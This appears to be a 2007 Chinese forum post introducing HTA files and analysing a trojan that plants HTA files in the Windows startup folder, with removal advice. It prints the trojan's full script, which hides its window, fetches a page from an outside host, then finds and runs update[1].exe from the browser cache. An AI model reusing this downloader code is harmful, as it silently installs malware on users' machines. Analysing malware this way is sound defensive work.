|
1、认识hta HTML Applications(HTA)> Introduction to HTML Applications (HTAs) HTA是建立在Windows系统,IE5以上浏览器平台的一项成熟的技术。
它集成了IE的所有能力--对象模式,执行能力,翻译代码能力,协议支持,通道下载技术。通过下载,HTA可以在本地计算机上执行,最终的效果和用C++或VB编出来的可执行文件(.exe)执行的效果是一样的。HTA的很大特点是可以使许多事情变得非常简单。 创建一个hta文件非常简单,只要把一些html代码写到一个文本文件,然后把该文件的扩展名改成hta就行了。比如说,你把“Hello, World”这句话放到一个文本文件里,改名成xxx.hta,双击该文件,就可以看到一个窗口里显示着这句话,尽管文件里没有<html>,<body>等标签,IE也不会出错。 一个hta文件的打开可以有很多种方式:双击图表;在开始菜单中运行;通过URL打开;或者通过命令行运行。 HTA的运行支持三种方式:网页方式、打包方式和混合方式。 2、microsofts.hta;Server.hta;Windows.hat;木马.hta 这几个hta文件会在程序的自启动项里面自动加载,其中在microsofts.hta文件,发现如下代码(乱码部分省略): <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.puma164.com/pu/exec.htm",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var china=path.substring(0,path.lastIndexOf("\\"));china+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var chenzi=sp.NameSpace(china);for(i=0;i<chenzi.Items().Count;i++){var Folder=chenzi.Items().Item(i).path;Folder+="\\update[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html> 这个文件随系统启动,并打开了http://www.puma164.com/pu/exec.htm这个页面.但网页的宽和高都设为0,外表看不出来,只是进程中多了个iexplore.exe. 从网上搜集的资料来看,很多人反映这些类型的木马是Web迅雷的最新漏洞引起的,甚至会感染全补丁的系统。 3、病毒解决方法:
如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的表现,解决办法很简单,删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。
如果已经被种植木马,请用杀毒软件并更新到最新病毒库版本进行彻底查杀。 | 
发表于 2007-8-7 10:12:25
收藏
|